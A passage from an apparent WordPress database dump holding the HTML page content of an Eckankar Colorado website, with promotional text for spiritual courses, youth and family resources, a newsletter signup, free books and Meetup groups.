48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241856,41083,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 